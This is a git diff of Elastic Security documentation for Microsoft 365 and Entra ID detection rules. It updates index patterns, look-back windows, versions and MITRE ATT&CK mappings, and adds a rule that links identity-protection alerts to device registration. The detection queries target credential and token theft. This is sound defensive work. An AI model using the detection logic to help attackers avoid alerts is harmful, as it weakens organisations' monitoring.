diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc index a731a5a038..4b38eacbf4 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-link-policy-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link polic *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link polic *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies when a Safe Link policy is disabled in Microsoft 365. 
Safe Link polic * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Identity and Access Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -107,10 +107,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc index 4a7b22c9cb..4c8b4c905a 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-creation.asciidoc @@ -7,8 +7,8 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies a transport rule creation in Microsoft 365. As a best practice, Excha * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc index 4983db6b45..2b989987b8 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-transport-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies when a transport rule has been disabled or deleted in Microsoft 365. 
* Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc index 8c1ff3d18d..3c44010fd9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-illicit-consent-grant-via-registered-application.asciidoc @@ -7,7 +7,7 @@ Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registe *Rule indices*: -* logs-o365** +* logs-o365.audit-* *Severity*: medium @@ -37,7 +37,7 @@ Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registe * Tactic: Initial Access * Tactic: Credential Access -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc index ef95b22a5f..07eb5c7f89 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-inbox-forwarding-rule-created.asciidoc @@ -7,8 +7,8 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox r *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox r *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when a new Inbox forwarding rule is created in Microsoft 365. 
Inbox r * Tactic: Collection * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc index 84f74f9253..a5f8656274 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-oauth-redirect-to-device-registration-for-user-principal.asciidoc @@ -35,7 +35,7 @@ Identifies attempts to register a new device in Microsoft Entra ID after OAuth a * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -119,3 +119,15 @@ sequence by related.user with maxspan=30m ** Name: Device Registration ** ID: T1098.005 ** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc index 6ab2e33c33..dd783d52bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-potential-ransomware-activity.asciidoc @@ -7,8 +7,8 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when Microsoft Cloud App Security reports that a user has uploaded fi * Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc index ca083cae14..d13cc0fc66 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-custom-application-interaction-allowed.asciidoc @@ -7,8 +7,8 @@ Identifies when custom applications are allowed in Microsoft Teams. If an organi *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when custom applications are allowed in Microsoft Teams. 
If an organi *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when custom applications are allowed in Microsoft Teams. If an organi * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: @@ -111,6 +111,10 @@ o365.audit.NewValue:True and event.outcome:success *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc index 0a689cc7af..10b2cffa3f 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-external-access-enabled.asciidoc @@ -7,8 +7,8 @@ Identifies when external access is enabled in Microsoft Teams. External access l *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when external access is enabled in Microsoft Teams. External access l *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when external access is enabled in Microsoft Teams. External access l * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -109,10 +109,10 @@ o365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Account Manipulation -** ID: T1098 -** Reference URL: https://attack.mitre.org/techniques/T1098/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc index 5aeb31076f..a7f1eb875d 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-teams-guest-access-enabled.asciidoc @@ -7,8 +7,8 @@ Identifies when guest access is enabled in Microsoft Teams. Guest access in Team *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when guest access is enabled in Microsoft Teams. 
Guest access in Team *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when guest access is enabled in Microsoft Teams. Guest access in Team * Tactic: Persistence * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc index 78f5f7ae77..dd3a8fcbeb 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-unusual-volume-of-file-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies that a user has deleted an unusually large volume of files as reporte *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies that a user has deleted an unusually large volume of files as reporte *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies that a user has deleted an unusually large volume of files as reporte * Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc index 85e8f9ad09..978c35c2d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-user-restricted-from-sending-email.asciidoc @@ -7,8 +7,8 @@ Identifies when a user has been restricted from sending email due to exceeding s *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a user has been restricted from sending email due to exceeding s *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies when a user has been restricted from sending email due to exceeding s * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Impact * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -107,10 +107,6 @@ event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.c *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ -* Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ diff --git 
a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc index 7f8014cc57..1e4823ef87 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-concurrent-sign-ins-with-suspicious-properties.asciidoc @@ -36,7 +36,7 @@ Identifies concurrent azure signin events for the same user and from multiple so * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -92,7 +92,7 @@ This rule requires the Azure logs integration be enabled and configured to colle [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index // Scheduled to run every hour, reviewing events from past hour | where @@ -166,3 +166,15 @@ from logs-azure.signinlogs* metadata _id, _version, _index ** Name: Steal Application Access Token ** ID: T1528 ** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc index 022a0709ec..5a1bf4060e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc @@ -8,7 +8,7 @@ Identifies a modification to a conditional access policy (CAP) in Microsoft Entr *Rule indices*: * filebeat-* -* logs-azure* +* logs-azure.auditlogs-* *Severity*: medium @@ -36,7 +36,7 @@ Identifies a modification to a conditional access policy (CAP) in Microsoft Entr * Tactic: Persistence * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc index 34f73f5704..c7cf873fe9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc @@ -10,9 +10,9 @@ Identifies when a user has elevated their access to User Access Administrator fo * filebeat-* * logs-azure.auditlogs-* -*Severity*: medium +*Severity*: high -*Risk score*: 47 +*Risk score*: 73 *Runs every*: 5m @@ -24,10 +24,12 @@ Identifies when a user has elevated their access to User Access Administrator fo * https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin?tabs=azure-portal%2Centra-audit-logs/ * 
https://permiso.io/blog/azures-apex-permissions-elevate-access-the-logs-security-teams-overlook +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ *Tags*: * Domain: Cloud +* Domain: Identity * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Audit Logs @@ -35,7 +37,7 @@ Identifies when a user has elevated their access to User Access Administrator fo * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -56,7 +58,7 @@ Identifies when a user has elevated their access to User Access Administrator fo *Investigating Microsoft Entra ID Elevated Access to User Access Administrator* -This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Microsoft Entra ID (Azure AD). This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a **New Terms** rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. +This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Azure RBAC. This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a New Terms rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. *Possible investigation steps* @@ -104,8 +106,10 @@ This rule identifies when a user elevates their permissions to the "User Access [source, js] ---------------------------------- event.dataset: azure.auditlogs - and azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" - and event.outcome: "success" + and ( + azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" or + azure.auditlogs.properties.additional_details.value: "Microsoft.Authorization/elevateAccess/action" + ) and event.outcome: "success" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc index 72f6963644..e76b052262 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc @@ -40,7 +40,7 @@ Identifies a high count of failed Microsoft Entra ID sign-in attempts as the res * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -102,7 +102,7 @@ This rule detects a high number of sign-in failures due to account lockouts (err [source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* | eval Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc index f22b11b551..cbb783422e 100644 --- 
a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-high-risk-sign-in.asciidoc @@ -8,7 +8,7 @@ Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Ident *Rule indices*: * filebeat-* -* logs-azure.signinlogs* +* logs-azure.signinlogs-* *Severity*: high @@ -36,7 +36,7 @@ Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Ident * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:azure.signinlogs and ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc index 92961bc4ed..65103352f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc @@ -7,7 +7,7 @@ Identifies an illicit consent grant request on-behalf-of a registered Entra ID a *Rule indices*: -* logs-azure* +* logs-azure.auditlogs-* *Severity*: medium @@ -37,7 +37,7 @@ Identifies an illicit consent grant request on-behalf-of a registered Entra ID a * Tactic: Initial Access * Tactic: Credential Access -*Version*: 217 +*Version*: 218 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc index a83076a872..051143ea98 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-mfa-totp-brute-force-attempts.asciidoc @@ -35,7 +35,7 @@ Identifies brute force attempts against Azure Entra multi-factor authentication * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -109,7 +109,7 @@ This rule requires the Entra ID sign-in logs via the Azure integration be enable [source, js] ---------------------------------- -from logs-azure.signinlogs* metadata _id, _version, _index +from logs-azure.signinlogs-* metadata _id, _version, _index | where // filter for Entra Sign-in Logs diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc index 23cb718764..4682848b7c 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-oauth-phishing-via-visual-studio-code-client.asciidoc @@ -16,7 +16,7 @@ Detects potentially suspicious OAuth authorization activity in Microsoft Entra I *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: 
now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Detects potentially suspicious OAuth authorization activity in Microsoft Entra I * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -136,3 +136,11 @@ event.outcome: "success" and ** Name: Spearphishing Link ** ID: T1566.002 ** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc new file mode 100644 index 0000000000..fc6a919fba --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-protection-alert-and-device-registration.asciidoc @@ -0,0 +1,132 @@ +[[microsoft-entra-id-protection-alert-and-device-registration]] +=== Microsoft Entra ID Protection Alert and Device Registration + +Identifies a sequence of events where a Microsoft Entra ID protection alert is followed by an attempt to register a new device by the same user principal. This behavior may indicate an adversary using a compromised account to register a device, potentially leading to unauthorized access to resources or persistence in the environment. + +*Rule type*: eql + +*Rule indices*: + +* logs-azure.identity_protection-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk#investigation-framework + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Protection Logs +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Protection Alert and Device Registration* + + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant?
+- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. +- Consider the context of the user account and whether the activity is expected. For example, if the user is a developer or administrator, they may have legitimate reasons for accessing resources from various locations or devices. +- A Microsoft Entra ID Protection alert may be triggered by legitimate activities such as password resets, MFA changes, or device registrations. If the user is known to perform these actions regularly, it may not indicate a compromise. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
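+
+The triage steps above can be supported with a quick pivot on the device-registration side of the sequence. The following KQL filter is only an illustrative sketch (it is not part of the rule) that reuses the audit-log fields from the rule query below; the user principal name is a placeholder to swap for the value taken from the alert:
+
+[source, js]
+----------------------------------
+event.dataset: "azure.auditlogs" and event.action: "Register device" and azure.auditlogs.properties.initiated_by.user.userPrincipalName: "user@example.com"
+----------------------------------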
